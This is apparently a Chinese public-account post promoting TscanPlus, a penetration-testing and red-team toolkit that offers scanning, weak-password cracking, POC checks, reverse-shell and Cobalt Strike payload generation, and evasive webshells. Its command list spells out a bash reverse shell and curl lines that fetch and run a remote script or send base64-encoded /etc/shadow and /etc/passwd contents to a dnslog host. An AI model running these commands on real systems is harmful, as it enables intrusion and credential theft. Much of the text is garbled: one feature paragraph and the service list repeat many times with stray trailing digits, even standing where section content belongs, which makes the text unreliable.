【工具分享】TscanPlus无影|综合性网络安全检测和运维工具

现在只有常读和星标的公众号才会显示大图推送。建议大家将「黑客之道HackerWay」设为星标，否则可能就看不到了！

简介：

一款综合性网络安全检测和运维工具，旨在快速资产发现、识别、检测，构建基础资产信息库，协助甲方安全团队或者安全运维人员有效侦察和检索资产，发现存在的薄弱点和攻击面。

主要功能：

信息搜集：支持对目标资产进行基础信息收集，包括IP、域名、开放端口、关联服务等网络情报。端口探测：通过扫描技术发现目标主机上开放的网络端口，识别潜在的可访问服务。服务识别：对探测到的端口进行服务类型与版本识别，辅助判断存在的安全风险。URL指纹识别：分析Web应用的响应特征（如标题、图标、路径等），识别所使用的技术框架或CMS系统。POC验证：提供漏洞验证模块，支持对已知安全漏洞进行主动检测与确认（仅限授权测试）。弱口令猜解：针对常见服务（如SSH、FTP、Redis等）进行密码强度评估，支持自定义字典进行登录尝试。目录扫描：枚举网站目录结构，发现隐藏页面、备份文件或敏感接口。UrlFinder：从网页内容、JS文件或其他公开资源中提取有效的URL链接，扩展资产范围。域名探测：通过子域名爆破、DNS查询等方式，发现目标主域下的子域及对应IP信息。网络空间测绘：利用公网搜索引擎和扫描技术，获取目标在互联网中的暴露面情况。项目管理：支持多任务、多资产的分类存储与进度跟踪，便于团队协作与结果归档。

辅助功能：

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。

使用：

1、项目管理：

项目管理功能是把各功能进行流程整合，用户可根据自己的使用场景设计项目功能，完美融合了"资产测绘"、"子域名枚举"、"IP端口扫描"、"密码破解"、"POC检测"、"URL扫描"、"目录探测"、"UrlFinder"等功能。项目执行结果会存储到相应项目数据库中，方便后续查询和使用。

2、信息收集：

信息搜集模块内置了多个API查询接口，需要配置cookie的有四项(爱站、站长之家、风鸟、beianx)，配置cookie后能搜集到更全面的信息，并可对cookie有效性进行验证。

3、端口扫描：

对目标IP进行存活探测、端口开放探测、端口服务识别、Banner识别等，可识别100余种服务和协议。

为方便某些场景下的使用，针对内网开放445端口的服务器会自动进行MS17010原理性探测，在避免对服务器造成影响的同时尽可能的探测可能存在的漏洞。

4、功能联动：

在任意功能中，都可与其他功能进行联动，比如IP扫描时可同时开启密码破解和POC检测，一旦发现匹配的端口服务会自动进行密码破解，发现匹配的指纹时会进行poc检测。勾选这两项即可，结果会显示在相关模块中。

5、URL探测：

TscanPlus目前整合指纹2.6W余条，经多次优化，有效提高了资产发现的协程并发效率，对1万个web系统进行指纹识别仅需8-10分钟，在效率和指纹覆盖面方面应该是目前较高的了。

6、域名枚举：

在域名枚举方面TscanPlus集成了多种功能，可以使用字典枚举，也可以使用多个免费接口进行查询。

7、POC检测：

TscanPlus内置了部分POC，并进行了Level分类，Level1是最常见、使用频率最高的POC，Level2是较通用的POC，Level3为不太常见POC。

8、密码破解：

TscanPlus内置48种常见服务的弱口令破解，可方便管理员对内网弱口令进行排查，为提高检测效率，优选并精简每个服务的用户名和密码字典。覆盖的服务包括：

SSHRDPSMBMYSQLSQLServerOracleMongoDBRedisPostgreSQLMemCachedElasticsearchFTPTelnetWinRMVNCSVNTomcatWebLogicJbossZookeeperSocks5SNMPWMILDAPLDAPSSMTPPOP3IMAPSMTP_SSLIMAP_SSLPOP3_SSLRouterOSWebBasicAuthWebdavCobaltStrike等等

9、AWVS扫描：

内置POC检测、弱口令破解、目录扫描等功能，Web漏洞扫描采用对接成熟商用工具方案。集成AWVS（Acunetix），利用其强大漏洞库与爬虫能力，实现高效的站点安全扫描。配置API Key并连接成功后，即可发起扫描任务。

10、空间测绘：

为使信息搜集更快捷方便，TscanPlus集成了多个网络空间测绘接口，包括鹰图Hunter、Fofa、shodan、360 Quake、Zoomeye 钟馗之眼、Censys、微步在线ThreatBook、BinaryEdge、VirusTotal等9个主流空探API，可根据域名、IP地址、端口、应用、服务等进行检索，并对各网络空探结果进行去重整合。

11、编码解码：

编解码功能模块实现了编码解码、哈希计算、加密解密、国密算法、数据格式化、其他转换等共36种类型，其中编码解码类8种、哈希计算13种、加密解密9种、国密算法3种、数据格式化9种、其他2种。

12、轻武器库：

目录枚举UrlFinderHost碰撞40xBypassJwt解码及破解IP归属查询代理池功能

13、红队命令：

TscanPlus内置常用红队命令，包括Win内网(凭证获取、权限维持、横向移动)命令26类、Linux内网命令18类、下载命令31条。内置各类反弹shell命令85条、MSF生成命令21条、CS免杀上线命令等，可根据shell类型、操作系统类型、监听类型自动生成代码。

Win内网：(凭证获取、权限维持、横向移动)命令26类、Linux内网命令18类。

下载命令：内置常见下载命令31条，基本能覆盖内网渗透能用到的下载方法，配置URL地址和目标文件名后，可自动生成相应代码。

Webshell：内置各种语言的基本一句话webshell和部分免杀马，以及冰蝎、蚁剑、哥斯拉等常见webshell的免杀马，供安全人员参考。

java编码：有时，通过 Runtime.getRuntime().exec() 执行命令有效负载会导致失败。使用 WebShell，反序列化利用或通过其他媒介时，可能会发生这种情况。

常用命令清单：bash -i >& /dev/tcp/127.0.0.1/6666 0>&1ping `whoami`.key.dnslog.cncurl http://www.google.com/bash.txt|bashcurl http://key.dnslog.cn/?r=`whoami`curl http://key.dnslog.cn/?r=`cat /etc/shadow|base64`curl http://key.dnslog.cn/?r=$(cat /etc/passwd|base64|tr 'n' '-')curl http://www.google.com/key.txtcurl http://www.google.com/key.txt -Ocurl http://www.google.com/key.txt -o key.txt

反弹shell：可设置IP/PORT、listener类型、shell类型、是否编码，选择你想要的命令后，即可生成响应代码。

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。0

14、辅助工具：

TscanPlus内置资产分拣、Windows提权辅助、杀软查询等工具。

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。1

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。2

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。3

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。4

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。5

15、其他功能：

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。6

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。7

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。8

编码解码：提供Base64、URL、Hex、Unicode等常见编码格式的转换与解析。加密解密：支持MD5、SHA系列等哈希计算，以及AES、DES等基础加密算法操作。CS上线辅助：生成Cobalt Strike等框架所需的载荷代码，用于合法渗透测试中的连接建立。反弹Shell生成：快速生成各类语言编写的反弹Shell命令，适用于不同操作系统环境。杀软查询：查询指定程序或载荷在主流安全软件中的查杀情况，辅助免杀分析。提权辅助：提供常见操作系统提权方法指引与利用脚本参考。常用命令：内置渗透测试中高频使用的Linux/Windows命令速查手册。字典生成：根据规则自动生成密码或路径字典，提升暴力破解效率。JAVA编码处理：支持Java相关的字符串转义、Class反编译提示等开发调试功能。资产分拣：对扫描结果按IP、域名、端口、服务类型等维度进行筛选与归类。Hots碰撞：检测多个来源中重复出现的高价值信息，辅助重点目标识别。40xBypass：尝试绕过常见的403/401等HTTP访问限制，探索未授权访问可能。Jwt破解：解析JWT令牌结构，验证签名方式，并支持本地密钥猜测。Ip归属地查询：查询IP地址所属地理位置、运营商及ASN信息，辅助溯源分析。9

SSHRDPSMBMYSQLSQLServerOracleMongoDBRedisPostgreSQLMemCachedElasticsearchFTPTelnetWinRMVNCSVNTomcatWebLogicJbossZookeeperSocks5SNMPWMILDAPLDAPSSMTPPOP3IMAPSMTP_SSLIMAP_SSLPOP3_SSLRouterOSWebBasicAuthWebdavCobaltStrike等等0

SSHRDPSMBMYSQLSQLServerOracleMongoDBRedisPostgreSQLMemCachedElasticsearchFTPTelnetWinRMVNCSVNTomcatWebLogicJbossZookeeperSocks5SNMPWMILDAPLDAPSSMTPPOP3IMAPSMTP_SSLIMAP_SSLPOP3_SSLRouterOSWebBasicAuthWebdavCobaltStrike等等1

高级配置：

在高级配置中可设置代理地址，在开启全局代理后，各功能都会代理，支持HTTP(S)/SOCKS5两种代理，支持身份认证。还可以设置全局cookie或UA等。

代理格式：

SSHRDPSMBMYSQLSQLServerOracleMongoDBRedisPostgreSQLMemCachedElasticsearchFTPTelnetWinRMVNCSVNTomcatWebLogicJbossZookeeperSocks5SNMPWMILDAPLDAPSSMTPPOP3IMAPSMTP_SSLIMAP_SSLPOP3_SSLRouterOSWebBasicAuthWebdavCobaltStrike等等2